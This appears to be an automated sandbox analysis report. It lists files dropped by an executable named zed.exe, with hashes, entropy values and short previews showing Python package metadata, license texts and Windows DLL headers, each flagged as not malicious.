                                                                                                                                                                                                                                            SHA1:B6C806E2AFF9A0F560916A90F793348DBF0514BA
                                                                                                                                                                                                                                            SHA-256:0064A9B5FD2AC18605E512EF7127318AD9CF259E9445488C169F237A590602E1
                                                                                                                                                                                                                                            SHA-512:3A71B533874F4D0F94F15192791D2FA4DF9E8EBF184C711F1D4FA97230C04764C1C9A93258355B08107E5B72053C6901E883E3DB577E8A204D5B9EB3F8BC7BFC
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.3.Name: cryptography.Version: 43.0.1.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: License :: OSI Approved :: BSD License.Classifier: Natural Language :: English.Classifier: Operating System :: MacOS :: MacOS X.Classifier: Operating System :: POSIX.Classifier: Operating System :: POSIX :: BSD.Classifier: Operating System :: POSIX :: Linux.Classifier: Operating System :: Microsoft :: Windows.Classifier: Programming Language :: Python.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Programming Language :: Python :: 3.7.Classifier: Programming Language :: Python :: 3.8.Classifier: Programming Language :: Python :: 3.9.Classifier: Programming Language :: Python :: 3.10.Classifier: Programming Language :: Python :: 3.11.Classifier: Programming Language :: Python :: 3.12.Classif
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):15579
                                                                                                                                                                                                                                            Entropy (8bit):5.567434003079107
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:bX1ToLbz5jF4E9VqhXJZ4WPB6s7B0Ppz+NX6in5Lqw/I+B:bXeLbhCEsJrPB6s7B0Ppz+96innVB
                                                                                                                                                                                                                                            MD5:E8478B758300439BF58613F2A3A2676C
                                                                                                                                                                                                                                            SHA1:39ED064E67212A54E4B8D1C909E6AD2ACF48025D
                                                                                                                                                                                                                                            SHA-256:5ADEAA62D3045659DDF79324823AA3BCB1CA78F264442D6F6F6B9C8A8470A634
                                                                                                                                                                                                                                            SHA-512:D7029823DC5585FBE885DDB52EED2D02D1584EB945EF23916391201FCBD17DF0B14F338BDFC6E81318297F831CA99796423206F781373857317E068F0C0B321C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:cryptography-43.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..cryptography-43.0.1.dist-info/METADATA,sha256=AGSptf0qwYYF5RLvcScxitnPJZ6URUiMFp8jelkGAuE,5440..cryptography-43.0.1.dist-info/RECORD,,..cryptography-43.0.1.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..cryptography-43.0.1.dist-info/WHEEL,sha256=8_4EnrLvbhzH224YH8WypoB7HFn-vpbwr_zHlr3XUBI,94..cryptography-43.0.1.dist-info/license_files/LICENSE,sha256=Pgx8CRqUi4JTO6mP18u0BDLW8amsv4X1ki0vmak65rs,197..cryptography-43.0.1.dist-info/license_files/LICENSE.APACHE,sha256=qsc7MUj20dcRHbyjIJn2jSbGRMaBOuHk8F9leaomY_4,11360..cryptography-43.0.1.dist-info/license_files/LICENSE.BSD,sha256=YCxMdILeZHndLpeTzaJ15eY9dz2s0eymiSMqtwCPtPs,1532..cryptography/__about__.py,sha256=pY_pmYXjJTK-LjfCu7ot0NMj0QC2dkD1dCPyV8QjISM,445..cryptography/__init__.py,sha256=mthuUrTd4FROCpUYrTIqhjz6s6T9djAZrV7nZ1oMm2o,364..cryptography/__pycache__/__about__.cpython-312.pyc,,..cryptography/__pycache__/__ini
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):94
                                                                                                                                                                                                                                            Entropy (8bit):5.016084900984752
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX5pGogP+tkKciH/KQb:RtvoTWKTQb
                                                                                                                                                                                                                                            MD5:C869D30012A100ADEB75860F3810C8C9
                                                                                                                                                                                                                                            SHA1:42FD5CFA75566E8A9525E087A2018E8666ED22CB
                                                                                                                                                                                                                                            SHA-256:F3FE049EB2EF6E1CC7DB6E181FC5B2A6807B1C59FEBE96F0AFFCC796BDD75012
                                                                                                                                                                                                                                            SHA-512:B29FEAF6587601BBE0EDAD3DF9A87BFC82BB2C13E91103699BABD7E039F05558C0AC1EF7D904BCFAF85D791B96BC26FA9E39988DD83A1CE8ECCA85029C5109F0
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: maturin (1.7.0).Root-Is-Purelib: false.Tag: cp39-abi3-win_amd64.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):197
                                                                                                                                                                                                                                            Entropy (8bit):4.61968998873571
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:hWDncJhByZmJgXPForADu1QjygQuaAJygT2d5GeWreLRuOFEXAYeBKmJozlMHuO:h9Co8FyQjkDYc5tWreLBF/pn2mH1
                                                                                                                                                                                                                                            MD5:8C3617DB4FB6FAE01F1D253AB91511E4
                                                                                                                                                                                                                                            SHA1:E442040C26CD76D1B946822CAF29011A51F75D6D
                                                                                                                                                                                                                                            SHA-256:3E0C7C091A948B82533BA98FD7CBB40432D6F1A9ACBF85F5922D2F99A93AE6BB
                                                                                                                                                                                                                                            SHA-512:77A1919E380730BCCE5B55D76FBFFBA2F95874254FAD955BD2FE1DE7FC0E4E25B5FDAAB0FEFFD6F230FA5DC895F593CF8BFEDF8FDC113EFBD8E22FADAB0B8998
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:This software is made available under the terms of *either* of the licenses.found in LICENSE.APACHE or LICENSE.BSD. Contributions to cryptography are made.under the terms of *both* these licenses..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11360
                                                                                                                                                                                                                                            Entropy (8bit):4.426756947907149
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nUDG5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEnQHbHR:UIvlKM1zJlFvmNz5VrlkTS0QHt
                                                                                                                                                                                                                                            MD5:4E168CCE331E5C827D4C2B68A6200E1B
                                                                                                                                                                                                                                            SHA1:DE33EAD2BEE64352544CE0AA9E410C0C44FDF7D9
                                                                                                                                                                                                                                            SHA-256:AAC73B3148F6D1D7111DBCA32099F68D26C644C6813AE1E4F05F6579AA2663FE
                                                                                                                                                                                                                                            SHA-512:F451048E81A49FBFA11B49DE16FF46C52A8E3042D1BCC3A50AAF7712B097BED9AE9AED9149C21476C2A1E12F1583D4810A6D36569E993FE1AD3879942E5B0D52
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. https://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial ow
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1532
                                                                                                                                                                                                                                            Entropy (8bit):5.058591167088024
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:MjUnoorbOFFTJJyRrYFTjzMbmqEvBTP4m96432s4EOkUTKQROJ32s3yxsITf+3tY:MkOFJSrYJsaN5P406432svv32s3EsIqm
                                                                                                                                                                                                                                            MD5:5AE30BA4123BC4F2FA49AA0B0DCE887B
                                                                                                                                                                                                                                            SHA1:EA5B412C09F3B29BA1D81A61B878C5C16FFE69D8
                                                                                                                                                                                                                                            SHA-256:602C4C7482DE6479DD2E9793CDA275E5E63D773DACD1ECA689232AB7008FB4FB
                                                                                                                                                                                                                                            SHA-512:DDBB20C80ADBC8F4118C10D3E116A5CD6536F72077C5916D87258E155BE561B89EB45C6341A1E856EC308B49A4CB4DBA1408EABD6A781FBE18D6C71C32B72C41
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Copyright (c) Individual contributors..All rights reserved...Redistribution and use in source and binary forms, with or without.modification, are permitted provided that the following conditions are met:.. 1. Redistributions of source code must retain the above copyright notice,. this list of conditions and the following disclaimer... 2. Redistributions in binary form must reproduce the above copyright. notice, this list of conditions and the following disclaimer in the. documentation and/or other materials provided with the distribution... 3. Neither the name of PyCA Cryptography nor the names of its contributors. may be used to endorse or promote products derived from this software. without specific prior written permission...THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND.ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED.WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOS
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7900672
                                                                                                                                                                                                                                            Entropy (8bit):6.519460416205842
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Hvisa2OcIo0UYN1YA2sBCT7I0XIU6iOGtlqNVwASO0AIjoI+b0vjemXSKSDhxlT3:Pi/2PTYDBCT7NY+gTNxY7GbdJ295x
                                                                                                                                                                                                                                            MD5:81AD4F91BB10900E3E2E8EAF917F42C9
                                                                                                                                                                                                                                            SHA1:840F7AEF02CDA6672F0E3FC7A8D57F213DDD1DC6
                                                                                                                                                                                                                                            SHA-256:5F20D6CEC04685075781996A9F54A78DC44AB8E39EB5A2BCF3234E36BEF4B190
                                                                                                                                                                                                                                            SHA-512:11CD299D6812CDF6F0A74BA86EB44E9904CE4106167EBD6E0B81F60A5FCD04236CEF5CFF81E51ED391F5156430663056393DC07353C4A70A88024194768FFE9D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......l..(...(...(...!...:...8...*...8...,...8... ...8...9...c..&...G...*...(...+...`...V...(.....`...)...`...)...Rich(...........................PE..d....j.f.........." ...).`Z..V........X.......................................x...........`.........................................p.r.......r...............t...............x......Cj.T....................Cj.(....Aj.@............pZ..............................text...._Z......`Z................. ..`.rdata..ZR...pZ..T...dZ.............@..@.data....+....r.......r.............@....pdata........t.......s.............@..@.reloc........x.......w.............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):5191960
                                                                                                                                                                                                                                            Entropy (8bit):5.962142634441191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:98304:n3+pefu6fSar+SJ8aqfPomg1CPwDvt3uFlDCE:3G+u6fb+SJ8aqfwmg1CPwDvt3uFlDCE
                                                                                                                                                                                                                                            MD5:E547CF6D296A88F5B1C352C116DF7C0C
                                                                                                                                                                                                                                            SHA1:CAFA14E0367F7C13AD140FD556F10F320A039783
                                                                                                                                                                                                                                            SHA-256:05FE080EAB7FC535C51E10C1BD76A2F3E6217F9C91A25034774588881C3F99DE
                                                                                                                                                                                                                                            SHA-512:9F42EDF04C7AF350A00FA4FDF92B8E2E6F47AB9D2D41491985B20CD0ADDE4F694253399F6A88F4BDD765C4F49792F25FB01E84EC03FD5D0BE8BB61773D77D74D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............l..l..l......l...m..l...i..l...h..l...o..l..m.y.l...m...l...o..l...h.l...l..l......l...n..l.Rich.l.........PE..d......e.........." ...%..7..4......v.........................................O.......P...`.........................................P.H.0....kN.@.....N.|.....K.d.....O../....N....P.C.8.............................C.@............`N..............................text.....7.......7................. ..`.rdata....... 7.......7.............@..@.data....n....K..<....J.............@....pdata..0.....K......4K.............@..@.idata...%...`N..&....N.............@..@.00cfg..u.....N.......N.............@..@.rsrc...|.....N......0N.............@..@.reloc........N......8N.............@..B................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):39696
                                                                                                                                                                                                                                            Entropy (8bit):6.641880464695502
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:NiQfxQemQJNrPN+moyijAc5YiSyvkIPxWEqG:dfxIQvPkmoyijP7SytPxF
                                                                                                                                                                                                                                            MD5:0F8E4992CA92BAAF54CC0B43AACCCE21
                                                                                                                                                                                                                                            SHA1:C7300975DF267B1D6ADCBAC0AC93FD7B1AB49BD2
                                                                                                                                                                                                                                            SHA-256:EFF52743773EB550FCC6CE3EFC37C85724502233B6B002A35496D828BD7B280A
                                                                                                                                                                                                                                            SHA-512:6E1B223462DC124279BFCA74FD2C66FE18B368FFBCA540C84E82E0F5BCBEA0E10CC243975574FA95ACE437B9D8B03A446ED5EE0C9B1B094147CEFAF704DFE978
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........iV...8...8...8..p....8.t9...8.p9...8...9...8.t=...8.t<...8.t;...8.1t<...8.1t;...8.1t8...8.1t:...8.Rich..8.........................PE..d...Sh.c.........." ...".H...(.......L...............................................n....`......................................... l.......p..P...............P....l.../......,...@d...............................c..@............`.. ............................text....G.......H.................. ..`.rdata..h....`.......L..............@..@.data................b..............@....pdata..P............d..............@..@.reloc..,............j..............@..B................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):787224
                                                                                                                                                                                                                                            Entropy (8bit):5.609561366841894
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12288:ytPc2nnGoNg4kSHoxX09yO5EavUFe9Xb12:y9jnnpTHoxXUsFe9XbM
                                                                                                                                                                                                                                            MD5:19A2ABA25456181D5FB572D88AC0E73E
                                                                                                                                                                                                                                            SHA1:656CA8CDFC9C3A6379536E2027E93408851483DB
                                                                                                                                                                                                                                            SHA-256:2E9FBCD8F7FDC13A5179533239811456554F2B3AA2FB10E1B17BE0DF81C79006
                                                                                                                                                                                                                                            SHA-512:DF17DC8A882363A6C5A1B78BA3CF448437D1118CCC4A6275CC7681551B13C1A4E0F94E30FFB94C3530B688B62BFF1C03E57C2C185A7DF2BF3E5737A06E114337
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>:V.PiV.PiV.Pi_..iX.PiC.QhT.Pi..QhT.PiC.UhZ.PiC.Th^.PiC.ShR.PillQhU.PiV.QiH.PillThf.PillPhW.Pill.iW.PillRhW.PiRichV.Pi................PE..d......e.........." ...%.*..........K........................................ ............`..........................................g...Q..............s.......@M......./......`.......8...........................`...@............p...............................text...D).......*.................. ..`.rdata..Hy...@...z..................@..@.data....N.......H..................@....pdata...V.......X..................@..@.idata...c...p...d...H..............@..@.00cfg..u...........................@..@.rsrc...s...........................@..@.reloc..4...........................@..B........................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):202008
                                                                                                                                                                                                                                            Entropy (8bit):6.367263484296302
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6144:4nwukKYdeMwj1XQk67ZLXni8Es7sp0HhiviBvDKax:KrqiviMax
                                                                                                                                                                                                                                            MD5:815F1BDABB79C6A12B38D84AA343196D
                                                                                                                                                                                                                                            SHA1:916483149875A5E20C6046CEFFEF62DD6089DDD5
                                                                                                                                                                                                                                            SHA-256:31712AE276E2CED05ECDA3E1C08FBBCC2CFF8474A972626ABA55F7797F0ED8C9
                                                                                                                                                                                                                                            SHA-512:1078E7E48B6F6ED160AE2BCCF80A43A5F1CCA769B8A690326E112BF20D7F3D018F855F6AA3B56D315DC0853472E0AFFCFE8E910B5CE69CE952983CFAA496C21D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!...@..@..@..8N..@.:...@.:...@.:...@.:...@.....@..8..@..@..@.....@.....@..."..@.....@.Rich.@.........PE..d.....f.........." ...(..................................................... ......?.....`............................................P...@............................/..........`4..T........................... 3..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...p ..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):68376
                                                                                                                                                                                                                                            Entropy (8bit):6.148788033723542
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:768:BV1EbYGVXq6KC/prVHBN0cW18itCQDFPnOMFn+gikF/nFX14uewjBcCCC0yamM/D:BDmF61JFn+/O/BI1L057Sy+xF
                                                                                                                                                                                                                                            MD5:8DBE9BBF7118F4862E02CD2AAF43F1AB
                                                                                                                                                                                                                                            SHA1:935BC8C5CEA4502D0FACF0C49C5F2B9C138608ED
                                                                                                                                                                                                                                            SHA-256:29F173E0147390A99F541BA0C0231FDD7DFBCA84D0E2E561EF352BF1EC72F5DB
                                                                                                                                                                                                                                            SHA-512:938F8387DCC356012AC4A952D371664700B110F7111FCC24F5DF7D79791AE95BAD0DBAF77D2D6C86C820BFD48A6BDBE8858B7E7AE1A77DF88E596556C7135ED4
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........5...Te..Te..Te...m..Te...e..Te.....Te...g..Te.Rich.Te.................PE..d......f.........." ...(..................................................................`.........................................`...H................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6927640
                                                                                                                                                                                                                                            Entropy (8bit):5.765554952149868
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:49152:Jc7/HNCHh0IWiUDFsx3hghs7g6kIPuch+Xe16/02yWYqiVx7qb4f4wmC36nhIVcF:JcBZhxsje2kUvid5E+vbHDMiEr/l9o
                                                                                                                                                                                                                                            MD5:CAE8FA4E7CB32DA83ACF655C2C39D9E1
                                                                                                                                                                                                                                            SHA1:7A0055588A2D232BE8C56791642CB0F5ABBC71F8
                                                                                                                                                                                                                                            SHA-256:8AD53C67C2B4DB4387D5F72EE2A3CA80C40AF444B22BF41A6CFDA2225A27BB93
                                                                                                                                                                                                                                            SHA-512:DB2190DA2C35BCEED0EF91D7553FF0DEA442286490145C3D0E89DB59BA1299B0851E601CC324B5F7FD026414FC73755E8EFF2EF5FB5EEB1C54A9E13E7C66DD0C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........D..Z%..Z%..Z%......X%....e.T%......^%......R%......W%..S]..@%...]..Q%..Z%..*$..O....%..O...[%..O.g.[%..O...[%..RichZ%..........PE..d......f.........." ...(..(..6B...............................................j......dj...`.........................................pdN.d....1O.......i......._.`I....i../... i..[..0.2.T.....................H.(....2.@............ (..............................text.....(.......(................. ..`.rdata..f7'.. (..8'...(.............@..@.data....J...`O......HO.............@....pdata..`I...._..J....^.............@..@PyRuntim0.....b.......a.............@....rsrc.........i...... h.............@..@.reloc...[... i..\...*h.............@..B........................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):31000
                                                                                                                                                                                                                                            Entropy (8bit):6.553885009751671
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:I8RVBC9t6Lhz64SHfZslDT90YBI1QGjHQIYiSy1pCQQRaAM+o/8E9VF0NytuSS:1GyqHfK1HBI1QGT5YiSyvXAMxkEm
                                                                                                                                                                                                                                            MD5:79CE1AE3A23DFF6ED5FC66E6416600CD
                                                                                                                                                                                                                                            SHA1:6204374D99144B0A26FD1D61940FF4F0D17C2212
                                                                                                                                                                                                                                            SHA-256:678E09AD44BE42FA9BC9C7A18C25DBE995A59B6C36A13EECC09C0F02A647B6F0
                                                                                                                                                                                                                                            SHA-512:A4E48696788798A7D061C0EF620D40187850741C2BEC357DB0E37A2DD94D3A50F9F55BA75DC4D95E50946CBAB78B84BA1FC42D51FD498640A231321566613DAA
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........t..'..'..'..g'..'-..&..'-..&..'-..&..'-..&..'...&..'..'...'...&..'...&..'...&..'...'..'...&..'Rich..'................PE..d.....f.........." ...(.....2......................................................._....`..........................................@..L...<A..x....p.......`.......J.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data...`....P.......8..............@....pdata.......`.......:..............@..@.rsrc........p.......>..............@..@.reloc..L............H..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):11358
                                                                                                                                                                                                                                            Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                                            MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                                            SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                                            SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                                            SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4648
                                                                                                                                                                                                                                            Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                                            MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                                            SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                                            SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                                            SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2518
                                                                                                                                                                                                                                            Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                                            MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                                            SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                                            SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
